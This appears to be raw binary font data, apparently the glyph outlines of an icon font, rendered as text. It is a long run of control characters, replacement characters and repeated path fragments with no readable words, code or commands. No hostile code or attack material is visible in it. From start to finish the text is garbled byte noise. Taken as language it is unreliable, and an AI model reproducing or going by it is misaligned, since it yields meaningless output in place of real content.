2N/$_Eh��h +Jc8%LHA'R:#b//!	(!/
!/
!/ &AW2�P0P��P��5V3RuN>Th��h���8cJ+*D1Hv^G"/,!/	/!�	/!	/!� ``;%.'.764632346323546323546327'7`Sm(/N3
p2   #=Q/h��h XCOuR3
V5J��p��PpP�0TA'!h��h�����8g%7'74&#"#4&#".32>=4&#"#54&#"%#".'.7614632>32>321>32�h��h 1p
2N/*tZ2WA& +Jc8%LHA'R:#b//!	(!/
!/
!/�h��hr��P��5V3RuNHY&AW2�P��R8cJ+*D1Hv^G"/,!/	/!�	/!	/!� ``954632354632#"&'.76463234632'7'� &AX1[s*/N3
p2 h��h�`pP�2WA&YGOuR3
V5J��p��h��h���.b54&#"14&#"54&#".#".32>5"&'.76463234632354632354632#�/!

/!

/!(	!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�".!/	�!/	/!��,/"G^vH1D*+Jc8�YGOuR3
V5j��p��0P�2WA&� @`24&#"#4&#".32>54&#"#54&#"#@ 2p
3N/*s[1XA&  0��0��5V3RuNHY&AW2PpP�����(S��.#".#"1.54632>3254&'1>54&#".#"1.54>3:>3254&#"14&#"54&#".#".32>51"&'.76463234632354632354632#)-
)T<1<T!#gI5Ig#+5!8L+9+L8!5+�/!

/!

/!(	!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2?)Z.<TT<.Z)�G)IggI)G']7+L8!!8L+7]���".!/	�!/	/!��,/"G^vH1D*+Jc8�YGOuR3
V5j��p��0P�2WA&��`� Cv>54&#".#"5463214632>54&#"*#".5467>32'4&#"#4&#".32>54&#"#54&#"#�B.#7

/A/!

/!!/#U;&?<T#+5bFG)Ig6*  2p
3N/*s[1XA&  �(.B%B.(N!/!//!x>&<T#T<%?%T3Gf#gI3T���0��5V3RuNHY&AW2PpP ����	Bw3#5377'7#53#554&#"14&#"54&#".#".32>5"&'.76463234632354632354632#1��g� �4�g� ��/!
/!
/!(	!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�� �k�� �k���!/	!/	�!/	/!��,/"G^vH1D*+Jc8�YHOtS2V5j��p��0P�2WA&@����	F73#53'7#53#54&#"#4&#".32>54&#"#54&#"#`��g� @��g� @ 1p
2N/*tZ2WA&  U�� �k�� �k{��0��5V2StOHY&AW2PpP$����Bx3#53'7#53#554&#"54&#"54&#".#".32>51"&'.76463234632354632354632#9��g� ��h� ��."

."

.")	
!//b":R'BGL%9cJ*��Zs+/M3
p1   %AX2�� �l��� �k��ʿ!/!/	�!/	/"��,/"G^wG1D+*Jc9�YGOuR3
V5j��p��/O�2WB%D����F3#53'7#53#5%4&#"#4&#".32>54&#"#54&#"#��g� ��h� �� 1p
3M/*tZ2WB%  �� �l��� �k����/��5V
3RuOGY&AW2PpPP ����+Z�.54>321'70"1'7.#"701#'754&#"14&#"54&#".#".32>5"&'.76463234632354632354632#�!8L+Sq!ODIgEN!qSW."

."

."(	
!//b":R'BGL%8dI+��Zt*/N2
p1   &AW22+L8!Sq!NEgIDO!qS���".!/	�!/	/!��,/"G^vH1D*+Id8�YGOuR3
V5j��p��0P�2WA&@����+^.54>321'70"1'7.#"701#'7%4&#"#4&#".32>54&#"#54&#"#�!8L+Sq!ODIgEN!qS7 1p
2N/*tZ2WA&  2+L8!Sq!NEgIDO!qS���0��5V
3RuOGY&AW2PpP~����7n#'73>32>32>321>32#".'.7612>50=4&#"#54&#"#54&#"#4&#".3��h��h�,!/
)!/
!/+Jc8%LHA'R:"b/2WA&   1p
2N/*tZ�h��h$/!�	/!	/!�8cJ+*D1Hv^G"/,� (BW/88�P0PpP��5V2StOHY��`:>32354632354632354632#"&'.76#'7�   &AX1[s*/N3
p2�h��h��АpPpP�2WA&YHOtS2V5:h��h�����6n3'7'7#>32>321>32#".'.7646322>50=4&#"#54&#"#54&#"#4&#".31��g��g�
)!/
!/+Jc8%LHA'R:#b//!,r2WA&   2p
2N/*tZh��h�	/!	/!�8cJ+*D1Hv^G"/,!/%�(BW/77�P0PpP��5V3RuNHY�``;354632354632354632#"&'.764632!'7'7#�   &AX1[s*/N3
p2h��h����pPpP�2WA&YGOuR3
V5Jh��h��`>m%>50=4&#"#54&#"#54&#"#4&#".'7'%#".'.7614632>32>321>32�/R<#   1p
2N/(mSh��h+Jc8%LHA'R:#b//!!/
)!/
!/!*AT-77�P0PpP��5V3RuNDX"h��h���8cJ+*D1Hv^G"/,!//!�		/!.!�@`@;%.'.7646323546323546323546327'7`Sm(/N3
p2   #=Q/h��h@XCOuR3
V5J�АpPpP�0TA'!h��h����`.h54&#"14&#".#"54&#".32>54632354632#"&'.764632354632'7'1�/!

/!)

/!!//b":R'AHL%8cJ+� &AW2Zt*/N2
p1 h��h�".!/	�!//!��,/"G^vH1D*+Jc8P�/WB(YGOuR3
V5j��p��h��hR�@`@954632354632#"&'.764632354632'7'� &AX1[s*/N3
p2 h��hPpP�2WA&YGOuR3
V5J�А�nh��h"��`7g%2>50=4&#"#54&#"#54&#"#4&#".31%#".'.7614632>32>321>32p2WA&   1p
2N/*tZ+Jc8%LHA'R:"b//!!/
)!/
!/ (BW/88�P0PpP��5V2StOHY�8cJ+*D1Hv^G"/,!//!�	/!	/!��@`@24&#"#4&#".32>54&#"#54&#"#` 2p
3N/*s[1XA&  p�0��5V3RuNHY&AW2PpP�����!5l�>54.#"5.546321'>54&#"546322>50=4&#"#54&#"#54&#"#4&#".3%#".'.7614632>32>321>32Z!8L++L8!5+#gIIg	:T<<TB..BP2WA&   1p
2N/*tZ+Jc8%LHA'R:"b//!!/
)!/
!/X="+L8!!8L+7]'G)IggI 9.<TT<.[/AA/�(BW/88�P0PpP��5V2StOHY�8cJ+*D1Hv^G"/,!//!�	/!	/!��`�"7j>54&#"5.54632:329'>54&#"546324&#"#4&#".32>54&#"#54&#"#J
gIIg5+#T<;U

JB./A/!!/` 2p
3N/*s[1XA&  |+IggI3T%?%<TT<)(.BB.(N!//!NR�0��5V3RuNHY&AW2PpP�����Kz>54&#"546322>50=4&#"#54&#"#54&#"#4&#".31%#".'.7614632>32>321>32 T<<TB..BP2WA&   2p
2N/*tZ+Jc8%LHA'R:#b//!!/
)!/
!/�.<TT<.Z/AA/�(BW/77�P0PpP��5V3RuNHY�8cJ+*D1Hv^G"/,!//!�		/!.!� ``F>54&#"546324&#"#4&#".32>54&#"#54&#"#B..B/!!/` 1p
2N/*tZ2WA&  �(.BB.(N!//!��0��5V2StOHY&AW2PpP�����Az�35#5#"&5467".'.764632>32>32>32#952>50=4&#"#54&#"#54&#"#4&#".392654&#"31�H@)7B..B7)p%LHA'R:#b//!!/
)!/
!/+Jc82WA&   2p
2N/*tZ�<TT<<TT< _?*.BB.*?��*D1Hv^G"/,!//!�		/!.!�8cJ+ (BW/77�P0PpP��5V3RuNHY�T<<TT<<T���`�%2e35#5#"&5467>54&#"546322654&#"34&#"#4&#".32>54&#"#54&#"#�H@(8B./A7)�B./A/!!/�;UU;<TT<� 2p
3N/*s[1XA&   _?*.BB.*?�(.BB.(N!//!0T<<TT<<Tp�0��5V3RuNHY&AW2PpP`����-d�.#".'.5463257>54&#"546322>50=4&#"#54&#"#54&#"#4&#".3%#".'.7614632>32>321>32`:"<T<.
B."6�T<<TB..BP2WA&   1p
2N/*tZ+Jc8%LHA'R:"b//!!/
)!/
!/KT<2L
3.B$3J.<TT<.[/AA/�(BW/88�P0PpP��5V2StOHY�8cJ+*D1Hv^G"/,!//!�	/!	/!�� �`1d<54&#".'.5463297>54&#"546324&#"#4&#".32>54&#"#54&#"#�K55KF2%8(#5		�B..B/!!/` 1p
2N/*tZ2WA&  �5KK53J
	
1 (8-"�(.BB.(N!//!��0��5V2StOHY&AW2PpP�����	
O3570&'!7'77'2>50=4&#"#54&#"#54&#"#4&#".31%#".'.7614632>32>321>32� �dd@}}�}}%cd�2WA&   2p
2N/*tZ+Jc8%LHA'R:#b//!!/
)!/
!/���RQQ��QQ��(BW/77�P0PpP��5V3RuNHY�8cJ+*D1Hv^G"/,!//!�		/!."����`�	
I3570&'!7'77'4&#"#4&#".32>54&#"#54&#"#� �dd@}}�}},cd� 1p
2N/*tZ2WA&  ���RQQ��QQ���0��5V3RuNHY&AW2PpP.��5i.32>=4&#"4&#".#".#"#7'7'"&'.7646323463234632354632#`/b":R'AHL%8cJ+/!

/!)(	!/�h��hZt*/N2
p1   &AW2��,/"G^vH1D*+Jc8�".!/		/!h��h�@YGOuR3
V5j��p��0���2WA&��`;3.32>54&#"#4&#"#4&#"#4&#"1#7'7��2p
3N/*s[1XA&   �h�����5V2StOHY&AW2P0��P��0h��M��6j54&#".#".#".32>=4&#"537'#"&'.7646323463234632354632#�/!)(	!//b":R'AHL%8cJ+/!

�h��h�Zt*/N2
p1   &AW2!/		/!��,/"G^vH1D*+Jc8�".�h��h� YGOuR3
V5j��p��0���2WA&��`;#.#"#4&#"#4&#".32>54&#"#37'a�  2p3N.+s[1XA& �h��h���P��0��5V3RuNHY&AW2P h��h���;i%'7'>=4&#"#4&#"#4&#"#4&#".%#".'.7614632>32>32>32`h��h/R<#   1p
2N/(mS +Jc8%LHA'R:#b//!	()!/
!/ "h��h��'AT0�P��P��P��5V
3RuOCX�8cJ+*D1Hv^G"/,!/		/!�.!� ``;>54&#"#4&#"#4&#"#4&#".1'7�0Q<#   2p
3N/(oQh��B��'AU0P0��P��0��5V3RuNDW!h�����9h4&#"#4&#".32>=4&#"#4&#"7'7#".'.7614632>32>32>32` 1p
2N/*tZ2WA& h��h +Jc8%LHA'R:"b//!	()!/
!/�P��P��5V2StOHY&AW2�P��h��h"�8cJ+*D1Hv^G"/,!/		/!�	/!�� ``8%4&#"#4&#".32>54&#"#4&#"7'7` 2p
3N/*s[1XA& h��h�r��0��5V3RuNHY&AW2P0��h��h���3b%12>=4&#"#4&#"#4&#"#4&#".%#".'.7614632>32>32>32p2WA&   1p
2N/*tj+Jc8%LHA'R:"b//!	()!/
!/ &AW2�P��P��P��5V2StOHY�8cJ+*D1Hv^G"/,!/		/!�	/!�� ``24&#"#4&#".32>54&#"#4&#"#` 2p
3N/*s[1XA&  0��0��5V3RuNHY&AW2P0�����`�9q��>321>54&#".#".#"54671>32>329>54&#".#".#"1.54>3:>321623212>=4&#"#4&#"#4&#"#4&#".%#".'.7614632>32>32>32f
.BT<	11	<T)
--�#gI55Ig#+5!8L+99+L8!5+�2WA&   1p
2N/*tj+Jc8%LHA'R:"b//!	()!/
!/8B.;.<TT<.[)�G)IggI)G']7+L8!!8L+7]��&AW2�P��P��P��5V2StOHY�8cJ+*D1Hv^G"/,!/		/!�	/!���`�0^�>54&#"1.#".#"154632146321>32>54&#*#1.#"*#"1.5467>32'4&#"#4&#".32>54&#"#4&#"#B.

7"#7

/A/!

/!!/
!/#U;?%&?<T#+5bFG))FFb6*� 2p
3N/*s[1XA&  b(.B%%B.(N!/!//!/!N*>&<T##T<%?%T3Gf##fG3T���0��5V3RuNHY&AW2P0�����@�#.8BFJT^hlp5'7'!467%5'7'!467"34&#112#546"354&#3535"34&#12#546"354&#3535@h��h6J��J6`h��h6J��J6��.B�B.!/�/!`P���.B�B.!/�/!`P����h��h�Q8�P�8Q`�h��h�R7��8QA/�p�/A /!pp!/ PP�  @  �B.��.B /!pp!/ PP�  @  ���@�#-15?CG5'7'!4675'7'!467"354&#3535"354&#3535�h��h6J��J6��h��h6J��J6!/�/!P���!/�/!P���~�h��h�R8��8R`�h��h�R7�O�7R@/!pp!/��  @  �/!pp!/��  @  ���@@!=GQ[eim%>54.#"5.54>325>54.#"54>32'12!46"34&#12#546"354&#3535�:F5[zFFz[5F:,40Ro??oR04,&AW22WA&!8L++L8!�<T��T<.B�B.!/�/!`P����.�PFz[55[zFP�.**rB?oR00Ro?Br*f<!2WA&&AW2!<x+L8!!8L+�T<��<T B.��.B /!pp!/ PP�  @  ���@@	=Y12!46"354&#35357>54.#"5.54>325>54.#"54>32�<T��T<!/�/!P����:F5[zFFz[5F:,40Ro??oR04,&AW22WA&!8L++L8!�T<��<T@/!pp!/��  @  .�PFz[55[zFP�.**rB?oR00Ro?Br*f<!2WA&&AW2!<x+L8!!8L+���@�#-7AEIS]gko%#4632#7'7%#4632#7'7"34&#12#546"354&#3535"34&#12#546"354&#3535@�T<<T�h��h`�T<<T�h��h��.B�B.!/�/!`P���.B�B.!/�/!`P�����<TT<�P�h��h�<TT<���h��h�A/�p�/A /!pp!/ PP�  @  �B.��.B /!pp!/ PP�  @  ���@`#-15?CG%#4632#7'7%#4632#7'7"354&#3535"354&#3535@�T<<T�h��h`�T<<T�h��h��!/�/!P���!/�/!P�����<TT<�P�h��h�<TT<��h��h�/!pp!/��  @  �/!pp!/��  @  @����&0:>BLV`dh!46323'7'7%12!46"34&#112#546"354&#3535"34&#12#546"354&#3535���T<<T�h��h�N<T��T<.B�B.!/�/!`P���.B�B.!/�/!`P�����`<TT<Ph��h�T<�P�<T A/�p�/A /!pp!/ PP�  @  �B.��.B /!pp!/ PP�  @  @����%)-7;?!46323'7'7%12!46"354&#3535"354&#3535���T<<T�h��h�N<T��T<!/�/!P���!/�/!P�����`<TT<Ph��h�T<�P�<T@/!pp!/��  @  �/!pp!/��  @  >����%/37AKU_cg>32!#'7%"34&#112#546"354&#353512!46"34&#12#546"354&#3535AQ8<T���h��hR.B�B.!/�/!`P���<T��T<.B�B.!/�/!`P����6JT<�P�h��h`A/�p�/A /!pp!/ PP�  @  T<��<T B.��.B /!pp!/ PP�  @  @����#-7;?>32!#'737"354&#353512!46"354&#3535BR8;U���h��h".�/!P���;U��T<".�/!P����6JT<�P�h��h@/!pp!/��  @  T<��<T@/!pp!/��  @  ��!+5?IMQ>54.#"5.54>3212!46"34&#12#546"354&#3535�,4+Jc88cJ+4,"&AW22WA&"�<T��T<.B�B.!/�/!`P���!%l>8cJ++Jc8>l%, T/2WA&&AW2/T 3T<��<T B.��.B /!pp!/ PP�  @  ��	=12!46"354&#35357>54.#"5.54>32�<T��T<!/�/!P���`,4+Jc88cJ+4,"&AW22WA&"�T<��<T@/!pp!/��  @  A%l>8cJ++Jc8>l%, T/2WA&&AW2/T 	`����%/9=ANp35#5#"&546712!46"34&#12#546"354&#35352654&#"3>54.#"5.54>32 @@)7B..B7)�p<T��T<.B�B.!/�/!`P���P<TT<<TT<�,4+Jc88cJ+4,"&AW22WA&" _?*.BB.*?�T<��<T B.��.B /!pp!/ PP�  @  �T<<TT<<T��%l>8cJ++Jc8>l%, T/2WA&&AW2/T `����"&*7;]#"&5467312!46"354&#35352654&#"3735>54.#"5.54>32 )7B..B7) �P<T��T<!/�/!P���P<TT<<TT<@��,4+Jc88cJ+4,"&AW22WA&"?*.BB.*?�T<��<T@/!pp!/��  @  �T<<TT<<T�  �%l>8cJ++Jc8>l%, T/2WA&&AW2/T ����`	'+/37;@D12!46"34&#12#546"354&#3535357#3!35#7'<T��T<.B�B.!/�/!`P���` �qqj���ࠠjqq�T<��<T B.��.B /!pp!/ PP�  @  ���jqr�    rq	����`	#',012!46"354&#3535357#3!35#7'<T��T<!/�/!P���` �qqj���ࠠjqq�T<��<T@/!pp!/��  @  ���jqr�    rq~����#-7;?3'7'7#!#'73>32'"34&#12#546"354&#3535��h��h���h��h�Q87R�.B�B.!/�/!`P���h��h�h��h6JJ6`B.��.B /!pp!/ PP�  @  ~����#'+3'7'7#!#'73>32'"354&#3535��h��h���h��h�Q87R�!/�/!P���h��h�h��h6JJ6@/!pp!/��  @  ~����#-7AEI3'7'7#!#'73>75'7'9'"34&#12#546"354&#3535��h��h���h��h�H2h��h2H�.B�B.!/�/!`P���h��h�h��h2H�h��h�H2`B.��.B /!pp!/ PP�  @  ~����",04>715'7'3'7'7#!#'737"354&#3535�H2h��h2H�h��h���h��hÏ!/�/!P���2H�h��h�H2h��h�h��h@/!pp!/��  @  ��@	(,0:DNX\`��12!46"34&#112#546"354&#353512!46"34&#12#546"354&#35357>54.#".#"54>32>32>54.#".#".54>32>32P<T��T<.B�B.!/�/!`P���<T��T<.B�B.!/�/!`P����&AW2HtD&2WA&!8L+,MpJ+L8!,40Ro?I}*8?oR04,:F5[zF3.�KFz[5F: T<�P�<T A/�p�/A /!pp!/ PP�  @  T<��<T B.��.B /!pp!/ PP�  @  �<!2WA&M<&AW2!<x+L8!"E[!8L+�*rB?oR0@5
0Ro?Br**.�PFz[54<5[zFP�.
��@	%/37_�12!46"354&#353512!46"354&#35357>54.#".#"54>32>32>54.#".#".54>32>32P<T��T<!/�/!P���<T��T<!/�/!P����&AW2HtD&2WA&!8L+,MpJ+L8!,40Ro?I}*8?oR04,:F5[zF3.�KFz[5F: T<�P�<T@/!pp!/��  @  T<��<T@/!pp!/��  @  �<!2WA&M<&AW2!<x+L8!"E[!8L+�*rB?oR0@5
0Ro?Br**.�PFz[54<5[zFP�.
@���	(,0:DNX\`�12!46"34&#112#546"354&#353512!46"34&#12#546"354&#35357>54.#".#".54>32>32P<T��T<.B�B.!/�/!`P���<T��T<.B�B.!/�/!`P���`"&AW2HtD&2WA&",4+Jc8!>$yH8cJ+4, T<�P�<T A/�p�/A /!pp!/ PP�  @  T<��<T B.��.B /!pp!/ PP�  @  m T/2WA&M<&AW2/T ,%l>8cJ+8E+Jc8>l%	@���	%/37e12!46"354&#353512!46"354&#35357>54.#".#".54>32>32P<T��T<!/�/!P���<T��T<!/�/!P���`"&AW2HtD&2WA&",4+Jc8!>$yH8cJ+4, T<�P�<T@/!pp!/��  @  T<��<T@/!pp!/��  @  m T/2WA&M<&AW2/T ,%l>8cJ+8E+Jc8>l%~����$.26>32!#'7%"34&#12#546"354&#3535�Q8<T���h��hR.B�B.!/�/!`P���6JT<��h��h`B.��.B /!pp!/ PP�  @  ~���� $9>32!#'7%"354&#3535�Q8<T���h��hR!/�/!P���6JT<��h��h@/!pp!/��  @  `����%/37!46323'7'7#'"34&#12#546"354&#3535���T<7R�h��h.B�B.!/�/!`P����<TJ6h��h�B.��.B /!pp!/ PP�  @  `����!%3'7'7#!46329'"354&#3535�h��h��T<7R�!/�/!P���h��h�<TJ6@/!pp!/��  @  �����%/375'7'!467"34&#12#546"354&#3535h��h6J��J6.B�B.!/�/!`P����h��h�R7��8QB.��.B /!pp!/ PP�  @  �����#5'7'!467"354&#3535h��h6J��J6!/�/!P����h��h�R7��8Q?/!pp!/��  @  �����%/37%7'75#4632"34&#12#546"354&#3535 h��h�T<<T�.B�B.!/�/!`P�����h��h�<TT<���B.��.B /!pp!/ PP�  @  �����#%#4632#7'7"354&#3535�T<<T�h��h!/�/!P����<TT<���h��h"/!pp!/��  @  ����	+<M#5353#73+"&=3;26='#353735#%!2#!"&=463"3!26=4&#!   `  � & % 
 
�0       � (88(��(88(%& %&���ࠠ��%&��

�``�@@��`8(�(88(�(8 &�%&�%����	+<#5353#73+"&=3;26=73#5#'#53%"3!26=4&#!   `  � & % 
 
�0       �`(88( (88(���ࠠ��%&��

�``�@@��`8(�(88(�(8����$5FO~#"&=46;5#";5#3%3532654&+5!2#!"&=463"3!26=4&#!32+%";2+"&51#1;2654&+"&546;234&+@@

``&%``@�� @&%` (88(��(88(%& %&�� @

@�&% 

 
 % &% 

 
 % �@
`
 %`&� @�`%%`8(�(88(�(8 &�%&�%`

`%%


&%%


%����$5>l#53#"&=46;#";5%532+#"3!26=4&#!32654&#%32#4&+";2+"&5131;2654&+"&546@@``%&``

@��`%&@ (88( (88(�� @

` % 
 

 %& % 
 

 %&� �&`% 
`
@@@%%`@8(�(88(�(8�@

 %


%%&


%%����!/:GP\e!2#!"&=463"3!26=4&#!##546;2#'"354&+532+#5732654&#532+#732654&# (88(��(88(%& %&��` & % @
`
 �`%&@  @

``%&@  @

�8(�(88(�(8 &�%&�%�`�%%��
  
 @%%`� @

 @%%`�@

����)6?KT!2#!"&=463354&+"357"354&+3532654&+732654&#3532654&+32654&# (88(��(88(� % &  
`
 � @&%` @

` @&%` @

�8(�(88(�(8�`�%%�``
  
 �`%%@ @

 �`%% @

����!-6@Y!2#!"&=463"3!26=4&#!532+#732654&##5353#7#"&=46;5#";5#3 (88(��(88(%& %&��`%&@  @

�  `  �@

``&%``@�8(�(88(�(8 &�%&�%�@%%`�@

 �ࠠ�`@
`
 %`&� ����%/H!2#!"&=4633532654&+32654&#35#'#3%#"&=46;5#";5#3 (88(��(88( @&%` @

�`  `   @

``&%``@�8(�(88(�(8��`%% @

 �ࠠ�`@
`
 %`&� ����!+7@KU!2#!"&=463"3!26=4&#!535#3535%532+#732654&#732+5326=4&# (88(��(88(%& %&����� `�`%&@  @

``%&` @

�8(�(88(�(8 &�%&�%�@ �`  @%%`�@

 &`%� �
`
����&/:D!2#!"&=463535#3535%3532654&+32654&#7326=4&+326=4&# (88(��(88(��� `� @&%` @

``&%` @

�8(�(88(�(8�@ �`  �`%% @

 �%`& �
`
����!.[hq!2#!"&=463"3!26=4&#!'#353735#46;2+"&53;2654&+532654&+"#532+#5732654&# (88(��(88(%& %&��P0       & %

& % 
 

  

 
�`%&@  @

�8(�(88(�(8 &�%&�%�`�@@��@%%		%%


 


@%%`� @

����KXa!2#!"&=463'#353735#346;2+32+"&5#;2654&'>54&+"#3532654&+732654&# (88(��(88(P0        
 

  

 
 % &

% &� @&%` @

�8(�(88(�(8�`�@@��@


 


%%		%%�`%%@ @

����!$/<IR!2#!"&=463"3!26=4&#!#73535#5#%'#353735#532+#5732654&# (88(��(88(%& %&���::    `��0       @`%&@  @

�8(�(88(�(8 &�%&�%�Pp@@ �� @`�@@��@@%%`� @

����+8A!2#!"&=46353535#5#%'#353735#3532654&+732654&# (88(��(88(�::    `��0       @ @&%` @

�8(�(88(�(8�PP @@ �� @`�@@��@�`%%@ @

����!2CPW!2#!"&=463"3!26=4&#!32+"&=463";26=4&+'#353735#73#'3 (88(��(88(%& %&�� %& %&

 

 �0       P0 @ @ �8(�(88(�(8 &�%&�%@&`%&`% 
`

`
@`�@@�ਨ������!2?F!2#!"&=463";26=4&+";26=4&+'#353735#'#37# (88(��(88(&% &% 

 

 �0       P0 @ @ �8(�(88(�(8`%`&%`& 
`

`
@`�@@�ਨ������!6CLe!2#!"&=463"3!26=4&#!;26=#+"&=#7532+#5732654&##"&=46;5#";5#3 (88(��(88(%& %&��% & 
 
 �`%&@  @

�@

``&%``@�8(�(88(�(8 &�%&�%� &%��

 @@%%`� @

`@
`
 %`&� ����%2;T!2#!"&=463;26=#+"&=#73532654&+732654&##"&=46;5#";5#3 (88(��(88(% & 
 
 � @&%` @

�@

``&%``@�8(�(88(�(8� &%��

 @�`%%@ @

`@
`
 %`&� ����!-8E!2#!"&=463"3!26=4&#!3#53#3#5373#%#5'53753 (88(��(88(%& %&�����`��  V*pp*j @ 00 �8(�(88(�(8 &�%&�%�@ � @ 
V�VVpp````  HH  ����'4"3!26=4&#!3#53#3#5373#%#5'53753(88( (88(�����`��  V*pp*j @ 00 �8(�(88(�(8�@ � @ 
V�VVpp````  HH  @���%-9F!2#!"&=46"3!26=4&##53%3535#53#5##53!'#353735#��(88(� (88(&&�&&� �� @�@  `  �0       �8(�(88(�(8 &�%&�%� ���  @`�``�``�@@��@���)6!2#!"&=46#5#3%3535##5#35335#'#353735#��(88(� (88� ��  @�@`  `  P0       �8(�(88(�(8����  @`�``�``�@@������!Bq�!2#!"&=463"3!26=4&#!+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��& %& & 
 

 
 `&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�%&`%%

`

�%%


&%%


%%%


&%%


%����1`�!2#!"&=463#+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+ (88(��(88(� 
 

 
 & &% &`&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 % �8(�(88(�(8�

`

%%`&%�%%


&%%


%%%


&%%


%@���&;ITbm!2#!"&=46"3!26=4&#73#'3;26=#+"&=#!##546;2#'"354&+##546;2#'"354&+��(88(� (88(&&�&&��0 @ @ �`% & 
 
 @` & % @
`
 �` & % @
`
 �8(�(88(�(8 &�%&�%��� &%��

 `�%%��
  
``�%%��
  
@���+9DR]"3!26=4&#73#'33;26=3+"&=!##546;2#'"354&+##546;2#'"354&+�(88(�(88(��0 @ @ �` 
 
 & %@` & % @
`
 �` & % @
`
 �8(�(88(�(8����� 

��%& `�%%��
  
``�%%��
  
����!-6epz!2#!"&=463"3!26=4&#!532+#732654&#7";2+"&51#1;2654&+"&546;234&+;2+5326=4&# (88(��(88(%& %&��`%&@  @

�&% 

 
 % &% 

 
 % �`%&` @

�8(�(88(�(8 &�%&�%�@%%`�@

 %%


&%%


%&`%� �
`
����%T_i!2#!"&=4633532654&+32654&#7";2+"&51#1;2654&+"&546;234&+3326=4&+326=4&# (88(��(88( @&%` @

�&% 

 
 % &% 

 
 % �`&%` @

�8(�(88(�(8��`%% @

 %%


&%%


%�%`& �
`
����!-;F!2#!"&=463"3!26=4&#!#35#535###546;2#'"354&+ (88(��(88(%& %&��` `  ``` & % @
`
 �8(�(88(�(8 &�%&�%`�  �  ``�%%��
  
����*5"3!26=4&#!#53#3#53'##546;2#'"354&+(88( (88(��` `  ` �` & % @
`
 �8(�(88(�(8�  �  @`�%%��
  
����!1:CP\e!2#!"&=463"3!26=4&#!532+732654&#32654&#7'#353735#532+#732654&# (88(��(88(%& %&��`%

&` @

@@

�0       @`%&@  @

�8(�(88(�(8 &�%&�%�x%		%�@

`@

 `�@@��@@%%`�@

���� )2?KT!2#!"&=46332654&'>54&+32654&#32654&#7'#353735#3532654&+32654&# (88(��(88(`&

%` @

@@

�0       @ @&%` @

�8(�(88(�(8�h%		% @

`@

 `�@@��@�`%% @

����!/:D]!2#!"&=463"3!26=4&#!#'#537353%32+5326=4&##"&=46;5#";5#3 (88(��(88(%& %&��P00      ��`%&` @

�@

``&%``@�8(�(88(�(8 &�%&�%��``�@@���&`%� �
`
`@
`
 %`&� ����)3L!2#!"&=46335#'#5#37%326=4&+326=4&##"&=46;5#";5#3 (88(��(88(P      00��`&%` @

�@

``&%``@�8(�(88(�(8���@@��``��%`& �
`
`@
`
 %`&� ����!-:Cr!2#!"&=463"3!26=4&#!3#53#37532+#5732654&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&�� ����`@`%&@  @

�&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�@ � @ @@%%`� @

 %%


&%%


%����)2a!2#!"&=46335#535#35#73532654&+732654&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88( ``����� @&%` @

�&% 

 
 % &% 

 
 % �8(�(88(�(8� @ � ��`%%@ @

 %%


&%%


%����'3=G!2#!"&=46"3!26=4&#3535#3#35#535#535#35353535#3535��(88(�`(88(&%�&%�� @�� `  `��� ``�� `�8(�(88(�(8 &�%&�%`��  �  �  @@ �` @ �` ����#-7!2#!"&=463535#3#35#535#535#35353535#3535��(88(�`(88h @�� `  `��� ``�� `�8(�(88(�(8���  �  �  @@ �` @ �` ����!1BJy!2#!"&=463"3!26=4&#!32+"&=46";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@ %& %&

 

 � @�&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%@&`%&`% 
`

`
��   %%


&%%


%���� 19h!2#!"&=463";26=4&#";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(@&% &% 

 

 � @�&% 

 
 % &% 

 
 % �8(�(88(�(8`%`&%`& 
`

`
��   %%


&%%


%����!-6BNW!2#!"&=463"3!26=4&#!532+#732654&#53#5##537532+#732654&# (88(��(88(%& %&��`%&@  @

�  `  �`%&@  @

�8(�(88(�(8 &�%&�%�@%%`�@

@`�``�` @%%`�@

����%1=F!2#!"&=4633532654&+32654&##5#35335#3532654&+32654&# (88(��(88( @&%` @

�`  `  @ @&%` @

�8(�(88(�(8��`%% @

@`�``�@�`%% @

����!-6C!2#!"&=463"3!26=4&#!532+#732654&##5'53753 (88(��(88(%& %&��``%&@  @

� @ 00 �8(�(88(�(8 &�%&�%�@%%`�@

````  HH  ����%2!2#!"&=4633532654&+32654&#75#'5#3 (88(��(88(` @&%` @

�@ 00 @ �8(�(88(�(8��`%% @

``  HH  ``����!B!2#!"&=463"3!26=4&#!+"&=46;2#4&+";2653 (88(��(88(%& %&��`& %& & 
 

 
 �8(�(88(�(8 &�%&�%�%&`%%

`

����1"3!26=4&#!+"&=46;2#4&+";2653(88( (88(��`& %& & 
 

 
 �8(�(88(�(8�%&`%%

`

����*;Lz�7'>=4&+";267'#"&=46;2'!2#!"&=463"3!26=4&#!";2+"&51#1;2654&+"&546;234&##536% &% 

 
,"�� (88(��(88(%& %&��@&% 

 
 % &% 

 
 %�� D	`&%`&
`

`
," 8(�(88(�(8 &�%&�%@%%


&%%


%� �����*;io+"&=46;2''#"&=46;2'"3!26=4&#!32#4&+";2+"&5131;2654&+"&546#536 %& %

 
,"��(88( (88(��@ % 
 

 %& % 
 

 %&�� D&`%&`	
`

`
," 8(�(88(�(8`%


%%&


%%� �����!/8HQZ!2#!"&=463"3!26=4&#!##532##'32654&#532+732654&#32654&# (88(��(88(%& %&�� `%%@&Z@

``%

&` @

@@

�8(�(88(�(8 &�%&�%�`�%%`�@

Xx%		%�@

`@

����'7@I"3!26=4&#!##532##'32654&#532+732654&#32654&#(88( (88(�� `%%@&Z@

``%

&` @

@@

�8(�(88(�(8�`�%%`�@

Xx%		%�@

`@

����!BOXdm!2#!"&=463"3!26=4&#!+"&=46;2#4&+";26537532+#5732654&#532+#732654&# (88(��(88(%& %&��& %& & 
 

 
  `%&@  @

``%&@  @

�8(�(88(�(8 &�%&�%�%&`%%

`

`@%%`� @

